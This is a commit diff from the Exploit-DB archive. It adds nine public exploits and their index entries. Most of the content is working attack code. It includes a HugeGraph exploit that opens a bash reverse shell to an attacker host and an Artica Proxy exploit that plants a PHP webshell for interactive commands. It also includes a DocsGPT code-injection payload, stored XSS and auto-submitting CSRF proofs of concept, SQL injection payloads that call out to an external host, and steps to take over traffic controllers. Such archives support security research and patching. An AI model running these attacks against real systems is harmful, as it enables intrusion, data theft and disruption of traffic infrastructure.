DB: 2025-04-10

10 changes to exploits/shellcodes/ghdb

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Artica Proxy 4.50 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

DocsGPT 0.12.0 - Remote Code Execution
This commit is contained in:
Exploit-DB 2025-04-10 00:16:32 +00:00
parent 2bc15f74f8
commit 762197db08
10 changed files with 572 additions and 0 deletions

56
exploits/java/webapps/52149.py Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-202427348
from requests import Request, Session
import sys
import json
def title():
print('''
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-202427348/exploit.py
''')
def exploit(url, lhost, lport):
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
headers = {
'Content-Type': 'application/json'}
s = Session()
url = url + "/gremlin"
req = Request('POST', url, json=payload, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15)
print(prepped.headers)
print(url)
print(resp.headers)
print(payload)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])

View file

@ -0,0 +1,62 @@
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
Privilege Vulnerability
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Version: ADManager Plus Build < 7210
# Tested against: Build 7203
# CVE: CVE-2024-24409
# Description
The Modify Computers is a predefined role in ADManager for managing
computers. If a technician user has the Modify Computers privilege
over a computer can change the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer object. In this
way, the technician user can set Constrained Kerberos Delegation over
any computer within the Organizational Unit that the user was
delegated.
Contrary to what ADManager claims the user who has the Modify
Computers role can change the privilege of computer objects in the
Active Directory. The Constrained Kerberos Delegation can be set for
any service such as CIFS, LDAP, HOST services. Then the user can
access these services by abusing the Constrained Kerberos Delegation.
In addition, the Unconstrained Kerberos Delegation can be set over the
computer objects by changing the userAccountControl attribute.
Normally, only users that have SeEnableDelegationPrivilege privilege
can set constrained kerberos delegation. Only members of the
BUILTIN\Administrators group have this privilege by default. The
delegated user for an Organizational Unit can not set constrained
kerberos delegation even if a user has the GenericAll right over a
computer account, so the delegation process in Active Directory does
not grant this privilege. However, the technician user can use the
SeEnableDelegationPrivilege right via the Modify Computers role.
# Vulnerability reasons
1. ADMP Web App Authorization issue: Assigning a predefined Modify
Computers role delegates the technician user to modify custom
attributes of computers unexpectedly. Even though it appears that this
privilege is not granted in the UI, the Additional Custom Attribute
property is assigned and this leads to broken access control
vulnerability.
2. There is no restriction for editing the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
application performs changes with domain admin privileges as designed
so that if we can bypass some restrictions (e.g. format of attribute
value), our requests are applied with domain admin privileges. This
way we can edit the attributes userAccountControl and
msDS-AllowedToDelegateTo.
# Impact
A technician user elevates privileges from Domain User to Domain
Admin. For example, the user can set Constrained Kerberos Delegation
over CLIENT1$ for the CIFS service of the domain controller and access
the CIFS service. As a result, the user is delegated to manage
CLIENT1$ but he can access the CIFS service of the domain controller
impersonating a user unexpectedly.
# Proof Of Concept
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409

View file

@ -0,0 +1,24 @@
# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
# Google Dork: N/A
# Date: 07/09/2024
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
# Vendor Homepage: https://www.q-free.com
# Software Link: N/A
# Version: 1.9
# Tested on: (Intelight x-1) Linux 3.14.57
# CVE : CVE-2024-38944
## Vulnerability Description
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
The issue results from the lack of authentication prior to allowing access to functionality.
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
## Steps to Reproduce
Navigate to the IP address of an identified controller
When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.

78
exploits/php/webapps/52146.py Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
application insecure deserialization (RCE)
# Google Dork:
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
ACTUAL_URL = URL[:-1]
else:
ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL
def check(ARTICA_URL):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
except Exception as e:
print(Fore.RED+"Could not reach, check URL")
if check.status_code==200:
print(Fore.GREEN+"Vulnerable")
return True
else:
print(Fore.RED+"Not Vulnerable")
def exploit(ARTICA_URL):
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
payload_data = {
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
"cache_serializer": "json",
"cache_size": 999999999,
"cache_data": {
payload: {
"cache_date": 0,
"ttl": 999999999
}
}
}
}
while True:
PAYLOAD_CMD = input("enter command: ")
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if response.status_code == 200:
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
cmd_response = requests.get(cmd_url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print(cmd_response.text)
else:
print("Failed to execute the payload")
check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
exploit(ARTICA_URL=ARTICA_URL)

View file

@ -0,0 +1,39 @@
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link:
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field
immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

View file

@ -0,0 +1,69 @@
# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
via Content Form
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143
Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
malicious property content with HTML inside it, which acts as a
stored XSS payload. If this property page is visited by anyone
including the administrator, then the XSS payload will be triggered..
Steps to reproduce
-------------------------
1. Login as a low privilege user with property edit capability.
2. Create or Edit one of the user owned property
(We can user the default property owned by the user).
3. Fill the content form with XSS payload using the Code View feature.
Before saving it make sure to go back using the usual view to see if the HTML
is rendered or not.
Vulnerable parameter name: property[property_description][content]
Example Payload: <img src="x" onerror="alert(document.cookie)">
4. After saving the new property content and clicking the 'Finish Editing',
go to the page and see the XSS is triggered.
It is possible to trigger the XSS by using any account or even
unauthorized account.
Burp Request
-------------------
POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
renovated 2-bedroom 2-bathroom
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
Blvd, Tampa, FL
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

View file

@ -0,0 +1,148 @@
## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
## Author: Sanan Qasimzada
## Date: 06.07.2024
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
)
## Proof and Exploit:
[href](https://streamable.com/1eqhw2)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

View file

@ -0,0 +1,54 @@
# Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile
picture
# Date: 2024-07-01
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
# Version: <= 1.0.5
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks.
Proof of concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
Sec-GPC: 1
Connection: close
Cookie: Cookie
action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
CSRF Exploit:
<html>
<body>
<form action="http://localhost:10003/wp-admin/admin-ajax.php"
method="POST">
<input type="hidden" name="action" value="pzfm_upload_avatar" />
<input type="hidden" name="imageData"
value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
/>
<input type="hidden" name="userID" value="1"" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Profile picture of user 1 will be changed in the dashboard
http://localhost:10003/dashboard/?dashboard=profile
Reference:
https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/

View file

@ -0,0 +1,33 @@
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
print(f"[+] Status Code: {response.status_code}")
print("[+] Response Body:")
print(response.text)
except Exception as e:
print(f"[-] Error sending request: {e}")

View file

@ -5471,6 +5471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java,,2016-06-06,2016-06-14,1,,,,,http://www.exploit-db.comapache-continuum-1.4.2-bin.tar.gz,
49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,,2021-01-08,2021-01-08,1,CVE-2020-17519,,,,,
48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,,2020-11-02,2020-11-02,0,,,,,,
52149,exploits/java/webapps/52149.py,"Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)",2025-04-09,"Yesith Alvarez",webapps,java,,2025-04-09,2025-04-09,0,CVE-2024-27348,,,,,
37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
@ -11991,6 +11992,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,,2021-01-05,2021-01-05,0,CVE-2020-29597,,,,,
48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15492,,,,,
34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80,2014-08-25,2014-08-25,0,CVE-2014-5335;OSVDB-110269,,,,,
52151,exploits/multiple/webapps/52151.txt,"Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)",2025-04-09,"Andrew Lemon/Red Threat",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-38944,,,,,
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
@ -12452,6 +12454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12189,,,http://www.exploit-db.com/screenshots/idlt47000/1.jpg,,
46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12252,,,,,
52148,exploits/multiple/webapps/52148.txt,"Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege",2025-04-09,"Metin Yunus Kandemir",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-24409,,,,,https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,,2019-05-03,2019-05-03,0,CVE-2019-11504,,,,http://www.exploit-db.comzotonic-0.46.0.zip,
22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple,,2012-11-05,2012-11-07,1,CVE-2012-5686;CVE-2012-5685;CVE-2012-5684;CVE-2012-5683;OSVDB-87142;OSVDB-87141;OSVDB-87140;OSVDB-87139,,,,http://www.exploit-db.comzpanelx-1_0_0.zip,
35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,,2010-11-23,2014-10-20,1,,,,,,https://www.securityfocus.com/bid/45027/info
@ -14123,6 +14126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@ -14285,6 +14289,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
